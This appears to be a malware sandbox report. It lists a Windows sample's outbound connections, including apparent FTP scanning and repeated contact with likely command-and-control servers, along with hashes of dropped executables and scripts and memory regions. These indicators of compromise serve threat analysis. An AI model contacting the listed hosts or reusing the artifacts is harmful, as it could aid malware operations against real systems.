US 162.39.122.18:21 tcp
JP 218.216.170.18:21 tcp
US 64.244.139.18:21 tcp
US 160.108.146.18:21 tcp
GB 79.123.109.18:21 tcp
MY 183.171.224.18:21 tcp
JP 163.139.106.18:21 tcp
CH 178.197.49.18:21 tcp
CN 182.126.90.18:21 tcp
FI 195.148.178.18:21 tcp
JP 220.97.75.18:21 tcp
DE 82.212.13.18:21 tcp
VN 171.235.18.18:21 tcp
JP 133.148.190.18:21 tcp
IR 5.211.0.18:21 tcp
CN 110.122.69.18:21 tcp
RO 94.131.119.184:443 tcp
US 55.130.173.18:21 tcp
CN 58.62.147.18:21 tcp
US 48.210.177.18:21 tcp
US 24.23.185.18:21 tcp
US 162.189.17.18:21 tcp
CN 202.127.157.18:21 tcp
CN 49.94.119.18:21 tcp
US 30.252.201.18:21 tcp
US 6.14.13.18:21 tcp
GB 62.190.184.18:21 tcp
CN 116.196.200.18:21 tcp
IT 151.30.93.18:21 tcp
SG 68.178.226.18:21 tcp
DE 194.174.238.18:21 tcp
PA 201.224.193.18:21 tcp
RU 185.215.113.67:15206 tcp
US 67.250.99.18:21 tcp
CL 186.40.17.18:21 tcp
US 20.83.148.22:80 tcp
NL 108.141.167.18:21 tcp
CN 175.57.103.18:21 tcp
DE 78.52.127.18:21 tcp
US 185.208.158.202:80 bertbhz.com tcp
MX 201.130.102.18:21 tcp
US 21.58.76.18:21 tcp
IT 157.29.237.18:21 tcp
US 170.209.156.18:21 tcp
JP 106.161.92.18:21 tcp
US 215.124.205.18:21 tcp
JP 202.255.203.18:21 tcp
EG 196.144.72.18:21 tcp
US 170.141.77.18:21 tcp
SG 43.49.164.18:21 tcp
MX 187.244.57.18:21 tcp
US 129.89.53.18:21 tcp
RU 95.26.194.18:21 tcp
CN 125.108.57.18:21 tcp
DE 93.104.100.18:21 tcp
PL 46.187.131.18:21 tcp
US 130.94.112.18:21 tcp
KR 118.222.62.18:21 tcp
US 159.150.25.18:21 tcp
CA 142.112.235.18:21 tcp
US 67.240.138.18:21 tcp
PL 37.249.250.18:21 tcp
HK 103.221.41.18:21 tcp
GB 194.227.36.18:21 tcp
BR 179.103.208.18:21 tcp
KR 203.234.196.18:21 tcp
US 73.225.38.18:21 tcp
IN 103.38.219.18:21 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
AE 62.60.236.215:3210 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.67:40960 tcp
CN 222.186.172.42:1000 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
FI 95.216.143.20:12695 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
AE 62.60.236.215:3210 tcp
US 20.83.148.22:80 tcp
RO 94.131.119.184:443 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 147.124.222.241:47056 tcp
US 20.83.148.22:80 tcp
DE 18.192.94.19:21 tcp
BR 200.220.251.19:21 tcp
CN 115.33.99.19:21 tcp
BR 179.227.230.19:21 tcp
KR 49.58.2.19:21 tcp
US 6.0.0.19:21 tcp
US 169.8.20.19:21 tcp
US 152.31.64.19:21 tcp
US 215.223.69.19:21 tcp
US 8.33.201.19:21 tcp
BG 95.43.48.19:21 tcp
CN 114.99.75.19:21 tcp
FR 161.105.86.19:21 tcp
SG 180.129.112.19:21 tcp
JP 210.230.181.19:21 tcp
BR 200.99.126.19:21 tcp
US 29.214.167.19:21 tcp
CN 61.188.215.19:21 tcp
CA 149.56.207.19:21 tcp
IT 85.46.214.19:21 tcp
CN 113.224.100.19:21 tcp
US 28.217.252.19:21 tcp
US 32.210.111.19:21 tcp
VN 123.20.150.19:21 tcp
HK 165.43.18.19:21 tcp
US 168.100.4.19:21 tcp
KR 175.121.110.19:21 tcp
US 72.100.194.19:21 tcp
IN 157.32.86.19:21 tcp
US 97.155.222.19:21 tcp
US 3.224.137.19:21 tcp
US 71.155.132.19:21 tcp
IN 101.222.1.19:21 tcp
RU 178.213.18.19:21 tcp
FI 84.34.127.19:21 tcp
US 107.87.252.19:21 tcp
KR 42.33.250.19:21 tcp
AE 62.60.236.215:3210 tcp
BR 179.126.130.19:21 tcp
US 24.193.116.19:21 tcp
N/A 10.26.131.19:21 tcp
AU 3.105.61.19:21 tcp
US 98.111.129.19:21 tcp
JP 163.148.130.19:21 tcp
JP 153.234.182.19:21 tcp
QA 20.173.163.19:21 tcp
CN 39.175.71.19:21 tcp
CL 179.56.245.19:21 tcp
JP 106.168.211.19:21 tcp
US 32.220.208.19:21 tcp
CA 66.170.182.19:21 tcp
US 138.175.10.19:21 tcp
US 126.243.104.19:21 tcp
IN 220.224.65.19:21 tcp
US 57.127.184.19:21 tcp
US 199.242.169.19:21 tcp
US 72.26.39.19:21 tcp
US 40.95.218.19:21 tcp
US 55.59.229.19:21 tcp
JP 157.11.209.19:21 tcp
US 155.35.236.19:21 tcp
CN 120.195.193.19:21 tcp
US 12.117.44.19:21 tcp
ES 80.25.208.19:21 tcp
US 11.249.69.19:21 tcp
CN 110.83.53.19:21 tcp
CA 161.187.168.19:21 tcp
TM 91.202.233.158:80 91.202.233.158 tcp
US 40.30.194.19:21 tcp
US 97.68.107.19:21 tcp
IT 81.122.188.19:21 tcp
KN 209.59.69.19:21 tcp
US 136.251.35.19:21 tcp
AU 14.201.17.19:21 tcp
NO 212.251.176.19:21 tcp
AR 201.254.48.19:21 tcp
US 51.111.124.19:21 tcp
US 20.83.148.22:80 tcp
JP 124.141.75.19:21 tcp
GB 80.6.131.19:21 tcp
NL 86.95.252.19:21 tcp
US 108.69.196.19:21 tcp
BH 57.88.46.19:21 tcp
SA 100.225.120.19:21 tcp
RU 185.215.113.117:3333 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
CN 183.57.21.131:8095 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 20.83.148.22:80 tcp
RO 94.131.119.184:443 tcp
AE 62.60.236.215:3210 tcp
RU 185.215.113.17:80 185.215.113.17 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
US 20.83.148.22:80 tcp
AE 62.60.236.215:3210 tcp
RU 185.215.113.36:80 185.215.113.36 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
ES 83.63.184.20:21 tcp
US 12.183.28.20:21 tcp
US 29.229.130.20:21 tcp
US 158.115.102.20:21 tcp
EG 45.102.55.20:21 tcp
US 24.252.218.20:21 tcp
US 20.83.148.22:80 tcp
JP 222.146.211.20:21 tcp
BR 179.204.109.20:21 tcp
CA 142.186.205.20:21 tcp
KR 106.100.29.20:21 tcp
US 97.58.99.20:21 tcp
SE 4.165.136.20:21 tcp
JP 60.141.143.20:21 tcp
SG 8.175.37.20:21 tcp
CN 116.239.231.20:21 tcp
DE 141.95.19.20:21 tcp
US 32.237.120.20:21 tcp
US 199.138.121.20:21 tcp
HU 82.150.61.20:21 tcp
RS 109.92.21.20:21 tcp
US 33.200.250.20:21 tcp
US 168.129.177.20:21 tcp
US 18.69.210.20:21 tcp
GB 94.229.78.20:21 tcp
BR 34.151.232.20:21 tcp
LU 185.131.1.20:21 tcp
CN 121.32.217.20:21 tcp
US 137.77.1.20:21 tcp
US 132.32.28.20:21 tcp
US 63.230.133.20:21 tcp
IT 164.142.145.20:21 tcp
US 172.53.214.20:21 tcp
FI 95.217.236.20:21 tcp
US 174.54.215.20:21 tcp
JP 158.210.231.20:21 tcp
CN 36.213.124.20:21 tcp
US 104.97.135.20:21 tcp
CA 142.55.35.20:21 tcp
US 20.83.148.22:80 tcp
IE 54.74.40.20:21 tcp
IN 171.53.101.20:21 tcp
US 98.249.34.20:21 tcp
US 34.182.127.20:21 tcp
CN 59.200.241.20:21 tcp
CA 156.57.26.20:21 tcp
US 146.123.74.20:21 tcp
US 166.195.125.20:21 tcp
IR 5.127.253.20:21 tcp
ZA 105.218.116.20:21 tcp
DE 85.179.59.20:21 tcp
US 168.53.1.20:21 tcp
US 76.131.67.20:21 tcp
BR 179.108.8.20:21 tcp
US 24.27.133.20:21 tcp
US 20.83.148.22:80 tcp
AT 91.118.109.20:21 tcp
CN 112.130.191.20:21 tcp
RU 185.215.113.36:80 185.215.113.36 tcp
SG 16.158.44.20:21 tcp
CZ 147.229.227.20:21 tcp
GB 194.217.134.20:21 tcp
AU 202.21.75.20:21 tcp
TW 218.170.165.20:21 tcp
US 169.102.6.20:21 tcp
UY 186.48.152.20:21 tcp
US 69.33.57.20:21 tcp
NL 89.105.201.183:2023 tcp
US 139.55.172.20:21 tcp
IE 78.19.169.20:21 tcp
CA 207.34.21.20:21 tcp
GB 82.7.126.20:21 tcp
IN 14.142.59.20:21 tcp
CN 222.65.162.20:21 tcp
US 98.188.108.20:21 tcp
N/A 10.103.50.20:21 tcp
RU 195.70.208.20:21 tcp
AU 211.190.192.20:21 tcp
AU 120.155.230.20:21 tcp
JP 126.12.222.20:21 tcp
VN 128.14.1.20:21 tcp
US 100.49.43.20:21 tcp
MX 148.204.50.20:21 tcp
DE 37.91.179.20:21 tcp
CN 110.56.19.20:21 tcp
NO 171.23.74.20:21 tcp
BR 191.10.116.20:21 tcp
US 215.123.251.20:21 tcp
US 56.252.50.20:21 tcp
CO 191.71.206.20:21 tcp
DE 79.250.49.20:21 tcp
US 33.220.191.20:21 tcp
US 199.46.67.20:21 tcp
DE 94.156.177.41:80 94.156.177.41 tcp
AE 62.60.236.215:3210 tcp
CN 222.186.172.42:1000 tcp
RU 185.215.113.67:15206 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
RO 94.131.119.184:443 tcp
US 20.83.148.22:80 tcp
FI 95.216.143.20:12695 tcp
US 20.83.148.22:80 tcp
AE 62.60.236.215:3210 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.67:40960 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
AE 62.60.236.215:3210 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 139.247.146.21:21 tcp
US 48.127.85.21:21 tcp
CH 57.240.153.21:21 tcp
CN 218.22.216.21:21 tcp
BR 189.124.187.21:21 tcp
UA 109.254.108.21:21 tcp
US 129.218.118.21:21 tcp
KR 211.170.153.21:21 tcp
GB 90.207.237.21:21 tcp
DE 77.12.71.21:21 tcp
CN 115.100.85.21:21 tcp
US 146.84.146.21:21 tcp
NO 195.134.49.21:21 tcp
JP 60.137.252.21:21 tcp
US 68.159.198.21:21 tcp
US 17.45.60.21:21 tcp
US 209.138.225.21:21 tcp
CO 190.14.230.21:21 tcp
IN 117.249.115.21:21 tcp
US 206.247.138.21:21 tcp
US 22.215.107.21:21 tcp
JP 124.97.81.21:21 tcp
US 15.129.200.21:21 tcp
US 35.172.120.21:21 tcp
RU 176.113.115.33:80 176.113.115.33 tcp
US 29.142.55.21:21 tcp
IN 14.102.87.21:21 tcp
CN 8.145.228.21:21 tcp
IT 151.16.32.21:21 tcp
RO 188.213.50.21:21 tcp
US 209.217.202.21:21 tcp
US 217.176.98.21:21 tcp
CN 125.107.108.21:21 tcp
US 104.11.227.21:21 tcp
US 55.26.159.21:21 tcp
US 19.211.62.21:21 tcp
US 207.17.21.21:21 tcp
US 8.48.65.21:21 tcp
JP 124.102.172.21:21 tcp
US 155.200.157.21:21 tcp
TR 81.215.32.21:21 tcp
NL 57.153.57.21:21 tcp
US 22.217.81.21:21 tcp
NL 34.141.203.21:21 tcp
CN 113.87.132.21:21 tcp
US 24.199.217.21:21 tcp
FR 88.185.80.21:21 tcp
KR 61.40.179.21:21 tcp
NL 84.26.91.21:21 tcp
US 70.15.178.21:21 tcp
CL 179.3.77.21:21 tcp
US 129.75.157.21:21 tcp
US 164.208.253.21:21 tcp
KR 169.216.147.21:21 tcp
JP 106.136.245.21:21 tcp
CN 117.118.230.21:21 tcp
US 9.158.114.21:21 tcp
US 16.119.214.21:21 tcp
ID 156.251.75.21:21 tcp
IE 89.126.81.21:21 tcp
CH 138.228.11.21:21 tcp
CN 123.92.182.21:21 tcp
US 40.136.235.21:21 tcp
US 20.83.148.22:80 tcp
BE 134.184.204.21:21 tcp
DK 80.199.172.21:21 tcp
US 147.108.237.21:21 tcp
CN 39.142.110.21:21 tcp
US 136.17.216.21:21 tcp
JP 182.166.17.21:21 tcp
CA 99.208.83.21:21 tcp
GB 89.197.167.21:21 tcp
US 21.99.49.21:21 tcp
KR 114.129.229.21:21 tcp
JP 133.208.144.21:21 tcp
US 23.30.30.21:21 tcp
US 29.226.128.21:21 tcp
RU 185.215.113.206:80 185.215.113.206 tcp
US 104.106.231.21:21 tcp
US 15.84.123.21:21 tcp
CN 112.63.180.21:21 tcp
US 223.29.131.21:21 tcp
US 23.163.185.21:21 tcp
MU 102.220.5.21:21 tcp
US 147.124.222.241:47056 tcp
DE 136.243.76.21:445 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
CN 183.57.21.131:8095 tcp
DE 136.243.76.21:139 tcp
AE 62.60.236.215:3210 tcp
RU 185.215.113.117:3333 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
N/A 127.97.192.17:21 tcp
NL 178.132.2.10:4000 tcp
US 20.83.148.22:80 tcp
NL 89.105.201.183:2023 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
AE 62.60.236.215:3210 tcp
US 20.83.148.22:80 tcp
FI 65.21.18.51:24164 tcp
FI 95.216.107.53:12311 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
RO 94.131.119.184:443 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
NL 154.213.187.170:80 tcp
US 20.83.148.22:80 tcp
NL 154.213.187.170:80 tcp
NL 77.173.86.22:21 tcp
FR 77.147.210.22:21 tcp
US 20.83.148.22:80 tcp
HR 78.1.17.22:21 tcp
AR 152.169.233.22:21 tcp
US 150.216.118.22:21 tcp
SE 85.225.161.22:21 tcp
RS 147.91.178.22:21 tcp
EG 156.219.129.22:21 tcp
JP 112.68.249.22:21 tcp
US 32.168.17.22:21 tcp
FR 212.222.215.22:21 tcp
RU 83.220.92.22:21 tcp
JP 106.178.60.22:21 tcp
US 148.84.78.22:21 tcp
US 165.105.10.22:21 tcp
US 20.83.148.22:80 tcp
BR 189.97.114.22:21 tcp
US 172.141.1.22:21 tcp
US 12.143.191.22:21 tcp
US 128.147.184.22:21 tcp
CN 49.221.181.22:21 tcp
CN 124.248.27.22:21 tcp
CH 193.134.92.22:21 tcp
CN 110.246.242.22:21 tcp

Files

C:\Users\Admin\Desktop\New Text Document mod.exse

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\Desktop\4363463463464363463463463.zip

MD5 202786d1d9b71c375e6f940e6dd4828a
SHA1 7cad95faa33e92aceee3bcc809cd687bda650d74
SHA256 45930e1ff487557dd242214c1e7d07294dbedfa7bc2cf712fae46d8d6b61de76
SHA512 de81012a38c1933a82cb39f1ac5261e7af8df80c8478ed540111fe84a6f150f0595889b0e087889894187559f61e1142d7e4971d05bceb737ed06f13726e7eae

C:\Users\Admin\Desktop\New Text Document mod.exse.zip

MD5 a7b1b22096cf2b8b9a0156216871768a
SHA1 48acafe87df586a0434459b068d9323d20f904cb
SHA256 82fbb67bf03714661b75a49245c8fe42141e7b68dda3f97f765eb1f2e00a89a9
SHA512 35b3c89b18135e3aca482b376f5013557db636a332a18c4b43d34d3983e5d070a926c95e40966fafea1d54569b9e3c4ab483eaca81b015724d42db24b5f3805f

memory/1680-9-0x000002AD30360000-0x000002AD30361000-memory.dmp

memory/1680-10-0x000002AD30360000-0x000002AD30361000-memory.dmp

memory/1680-8-0x000002AD30360000-0x000002AD30361000-memory.dmp

memory/1680-14-0x000002AD30360000-0x000002AD30361000-memory.dmp

memory/1680-15-0x000002AD30360000-0x000002AD30361000-memory.dmp

memory/1680-20-0x000002AD30360000-0x000002AD30361000-memory.dmp

memory/1680-19-0x000002AD30360000-0x000002AD30361000-memory.dmp

memory/1680-18-0x000002AD30360000-0x000002AD30361000-memory.dmp

memory/1680-16-0x000002AD30360000-0x000002AD30361000-memory.dmp

memory/1680-17-0x000002AD30360000-0x000002AD30361000-memory.dmp

memory/4960-21-0x0000000000590000-0x0000000000598000-memory.dmp

memory/3892-22-0x0000000000900000-0x0000000000908000-memory.dmp

memory/3892-23-0x00000000052A0000-0x000000000533C000-memory.dmp

C:\Users\Admin\Desktop\a\O8TeHpI.exe

MD5 e3eb0a1df437f3f97a64aca5952c8ea0
SHA1 7dd71afcfb14e105e80b0c0d7fce370a28a41f0a
SHA256 38ffd4972ae513a0c79a8be4573403edcd709f0f572105362b08ff50cf6de521
SHA512 43573b0cbaac6e2e1646e6217d2d10c40ad10b9db1f4492d6740545e793c891b5e39283a082896c0392b88eb319dfa9392421b1c89c094c9ce9f31b53d37ebaf

C:\Users\Admin\Desktop\a\fHR9z2C.exe

MD5 892d97db961fa0d6481aa27c21e86a69
SHA1 1f5b0f6c77f5f7815421444acf2bdd456da67403
SHA256 c4b11faff0239bc2d192ff6e90adec2684124336e37c617c4118e7e3bc338719
SHA512 7fe31101f027f2352dea44b3ba4280e75a4359b6a822d813f9c50c0d6ef319b7c345280786c1bc794b45fbd4fa87939a79cc15b82fc7959ccce1b732f33ba241

C:\Users\Admin\AppData\Local\Temp\1998.vbs

MD5 8b4ed5c47fdddbeba260ef11cfca88c6
SHA1 868f11f8ed78ebe871f9da182d053f349834b017
SHA256 170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5
SHA512 87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf

C:\Users\Admin\AppData\Local\Temp\8504.vbs

MD5 34b33b5a437e20d03d79b62a797dfe99
SHA1 9b57b598a7e9d66157a05a44bc7c097bf5486e6c
SHA256 f920f526773c0565072fcfd250319c9dd53b9197d448b9d29307598e0fa004e1
SHA512 757be8161af2eb4af36772e2e0d912e0967540cb42ef6ef8cd85f28edb478756c99d9e7a6fef04b16e6bf63a3dc9ddb9c2adf490e8d9ae2ca0e3e9b76ef6fa6c

C:\Users\Admin\Desktop\Files\built.exe

MD5 a813f565b05ee9df7e5db8dbbcc0fa43
SHA1 f508e738705163233b29ba54f4cb5ec4583d8df1
SHA256 ba59fb813ff718db8a17c4e5d244793d2199383969843ad31d09727b5e5ff156
SHA512 adb431c372c2e1d0f6019bedefe16a2253fcf76929ba7e2b9f9cc7a253137920615121a1a64f7003a43f39e8b17ace233daca32b2933b6953aa6cf558b834e2e

memory/2484-149-0x0000000000F80000-0x00000000012A4000-memory.dmp

memory/4384-152-0x000000001BB30000-0x000000001BB80000-memory.dmp

memory/4384-154-0x000000001D150000-0x000000001D202000-memory.dmp

C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe

MD5 bf7866489443a237806a4d3d5701cdf3
SHA1 ffbe2847590e876892b41585784b40144c224160
SHA256 1070bf3c0f917624660bef57d24e6b2cf982dce067e95eb8a041586c0f41a095
SHA512 e9bb9d5157d2011eed5f5013af4145877e3237def266f2cc6fd769ed7065a4fa227f7d316de5fc7eeae8f3f852b685fb3cc166127f79134f1fa1a200b8c0c186

C:\Users\Admin\AppData\Local\Temp\cjlDDzoa4tYZ.bat

MD5 18b99ca38f9a4989ed9bc8b0a388cc7f
SHA1 0346388643e219a632bc0ff41124675c37d1e757
SHA256 64625109e37ca0a668e3f13eaaa6abc193a80a0d5fcdeab75431c3caafd472f5
SHA512 69939fbcf40d80c1c34d7f7c30fcf340f988a005ea63970416bdb0f06b20d56a1fa44fb65ad07b192b1d0f70198b05b7c09042f84e478c17f27981a6b3a35573

memory/1432-176-0x0000000000C60000-0x0000000000CD4000-memory.dmp

memory/1432-177-0x0000000005AC0000-0x0000000006066000-memory.dmp

memory/1432-178-0x00000000055B0000-0x0000000005642000-memory.dmp

memory/1432-179-0x0000000005590000-0x000000000559A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4284.vbs

MD5 bb8cfb89bce8af7384447115a115fb23
SHA1 6a0e728f4953128db9db52474ae5608ecee9c9c3
SHA256 d812291a41eddd5eac04972e66feffc44c1ee2c249d708bb282144823a6e8485
SHA512 d69901ba3cebd1fe8ed8e3d613e16a6cfbead827a9493a7edd8c62fb2915a550450ff4f47f00a8c66880ea10cd4029bceac4518d1951c19fb7ad9d7505007553

memory/1432-183-0x00000000057D0000-0x00000000057E2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PerfWatson1.exe.log

MD5 7787ce173dfface746f5a9cf5477883d
SHA1 4587d870e914785b3a8fb017fec0c0f1c7ec0004
SHA256 c339149818fa8f9e5af4627715c3afe4f42bc1267df17d77a278d4c811ed8df1
SHA512 3a630053ae99114292f8cf8d45600f8fe72125795252bf76677663476bd2275be084a1af2fcb4ce30409ba1b5829b2b3ffb6795de46d2a703c3314017a86f1ff

C:\Users\Admin\AppData\Local\Temp\RW4i2n0v4jZt.bat

MD5 a2b62bc20c313e966918275d0d8981c2
SHA1 4c2644dbc5331f3a7c52f6487065e096a353c071
SHA256 8f42d64a8ad6bc2aecf8e44934fafe5ef92c0eaed8e249856e0c7f7e543da9fa
SHA512 f8a6650bbfd4235670d0376eb4024ed66f249354613a03c8882f9e04c96f56ea48ff1ee015e02f33abe331611a35385ee37ffb5a7db7abda06024f46bf83cea8

C:\Users\Admin\AppData\Local\Temp\nZRwf4i3gbqv.bat

MD5 916df3b09d71a298aabd1bae71d177f9
SHA1 b7df9845b2a92c8a41962315b3bf400f42c5285f
SHA256 025fb315a564fd01a82340ef30b95268213436eee87ea7ae58efd1762d456dbd
SHA512 32bfe8618af0b81bb18069b46df203364ae5c7f3c34460666972b27293ab18cbe43cdd1fdc44e9a2868f6703f3aba5db89a7277fcf916e9151a4b8c2698f8605

memory/1432-201-0x0000000008B20000-0x0000000008B74000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3ufjDrYsMBh2.bat

MD5 1f7a02ddbe6b11f3a13624fce9dcd983
SHA1 6c6ca582d54de77bfb2656070c8f1c63c3c1ccd0
SHA256 35bf661bda708111a756b9545f47f2e8cfab8b9f67b40cecf3c986cd47198d75
SHA512 cd63aebfc44fa74c7419783fb0012eeb631dbea23208f7f1173f6ee6951e4fabbfe045a23b84a0acc72421502fa168a4ea727d4f99ae97b986e2c45e027c1da6

C:\Users\Admin\AppData\Local\Temp\qJmll3zvJ2Zb.bat

MD5 f746b1eeee51971bd6335495bb11faa0
SHA1 6847698c17ae2bfddfd63d2b894bea984abde38d
SHA256 07dddd827ad11cdf17ba5f649baa9a13298fef3892a2e82ce2c8e7a06cbfc8a4
SHA512 b315e4e0710ce2aa3af5f821396b9a4e791990f8beefd5a0da4a3ac5886027979272824cd60297bf7711712dcf67cfbe1085ee05039830b111f1b66b69a2d4cb

C:\Users\Admin\Desktop\Files\stail.exe

MD5 982b28b7a4ddf710c387bc1de86012fa
SHA1 cd16c3b0023aba3b81f76e62f3538a626b853e3f
SHA256 8dc08f6b4e5ef0c645d5d2715570245dec0ead9e8901a5a53628bc87af8d4cae
SHA512 f6ef7da09d2ea6c70a1be8bdcec4e18b7d87b9e0b4ec7f4c84aa26a3afdc140600c86a700b5a2ecedd7bfe1cd446222cbbbf2840e6737012d1d0f09be45f4f49

memory/3040-232-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-VS7FV.tmp\stail.tmp

MD5 0105db577ef93eb65dd36401043955dd
SHA1 c63a4ad0596d4a5b137381349bea62ed8e1903f2
SHA256 1413f6894ac7c897cd766605eaee45f0f7ea19c67baaabba5dff56c05f575f6f
SHA512 e7166d033a1e664465b8c149e09356bd1ce93d68996e42afad2340effacaa6b0d1fd2cb81002c4ab809078b95ad19dfeedc899b29bd9167d9856055bf9d60a74

C:\Users\Admin\AppData\Local\Temp\is-QP7MN.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\Users\Admin\AppData\Local\Lerry Video 22.0.1000\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

C:\Users\Admin\AppData\Local\Lerry Video 22.0.1000\lerryvideo.exe

MD5 fc0a1f30fc6bc8011259afa093c49202
SHA1 12ca0576b8517831a48931d3762843b0e3a8579c
SHA256 1ba130ef829fafe246fac7ffb3a02143149c074db5247b193a63b215be0b99eb
SHA512 c71cd259f2926bcd689da8308d217bf6ca4338553f14ae53af6954c6d56f233b13b7e8d3fa9d0da86b320a4b17a6154dded554d241e9a1e9a52a387353500d8f

memory/2372-274-0x0000000000400000-0x0000000000735000-memory.dmp

memory/2372-273-0x0000000000400000-0x0000000000735000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pqGYxp582ui4.bat

MD5 55d775eadb82172427c9a913c29bf7ce
SHA1 b36be38448113a513bbd4c3a96847fd735305d05
SHA256 c586773faa2f6586559956825338221c37a82a0f728a58307a1392a4309d3ca7
SHA512 49c292500458bd7b5cb72abae126100f5e47101e8a13b257edd6ce6a9326a34ee33b4868fedd6c2128bebd0dea31adb4d989294226d66271996026c2f43b57db

memory/3040-283-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2372-287-0x0000000060900000-0x0000000060992000-memory.dmp

memory/2372-289-0x0000000000400000-0x0000000000735000-memory.dmp

memory/4268-288-0x00000000024E0000-0x0000000002516000-memory.dmp

memory/1672-285-0x0000000000400000-0x00000000004BC000-memory.dmp

memory/4268-290-0x0000000005050000-0x000000000571A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp283A.tmp

MD5 064bc9b972c74facb8b8b1eb46b0ee4a
SHA1 48b551819ba0698c47297482bcb89f5125c959bd
SHA256 8e7ffa23c43c7039a68510b615267b43bf9902f2e243a2c798aa1073e734f439
SHA512 bc72be79a54cee94e6795b3f58aff2982b80a00b68f79718ef8e5953db0e234d22f572bf2c9b268795fb09526e1c8a53e6eb31b0eaaaf62067f8e49e1cdd8112

memory/3756-293-0x0000000000400000-0x0000000000410000-memory.dmp

memory/4268-296-0x0000000005750000-0x0000000005772000-memory.dmp

memory/4268-298-0x00000000058D0000-0x0000000005936000-memory.dmp

memory/4268-297-0x00000000057F0000-0x0000000005856000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ckov4ooi.3fo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4268-308-0x0000000005A40000-0x0000000005D97000-memory.dmp

memory/4268-309-0x0000000005E80000-0x0000000005E9E000-memory.dmp

memory/4268-310-0x0000000005F20000-0x0000000005F6C000-memory.dmp

memory/4268-311-0x0000000007050000-0x0000000007082000-memory.dmp

memory/4268-312-0x00000000707A0000-0x00000000707EC000-memory.dmp

memory/4268-322-0x0000000007090000-0x00000000070AE000-memory.dmp

memory/4268-323-0x00000000070B0000-0x0000000007153000-memory.dmp

memory/4268-324-0x0000000007830000-0x0000000007EAA000-memory.dmp

memory/4268-325-0x00000000071E0000-0x00000000071FA000-memory.dmp

memory/4268-326-0x0000000007250000-0x000000000725A000-memory.dmp

memory/4268-327-0x0000000007440000-0x00000000074D6000-memory.dmp

C:\Users\Admin\Desktop\Files\windowsexecutable.exe

MD5 58e8b2eb19704c5a59350d4ff92e5ab6
SHA1 171fc96dda05e7d275ec42840746258217d9caf0
SHA256 07d4b7768e13d79ac5f05f81167b29bb6fbf97828a289d8d11eec38939846834
SHA512 e7655762c5f2d10ec246d11f82d437a2717ad05be847b5e0fd055e3241caaca85430f424055b343e3a44c90d76a0ba07a6913c2208f374f59b61f8aa4477889f

memory/3376-346-0x0000000000B80000-0x0000000000BD2000-memory.dmp

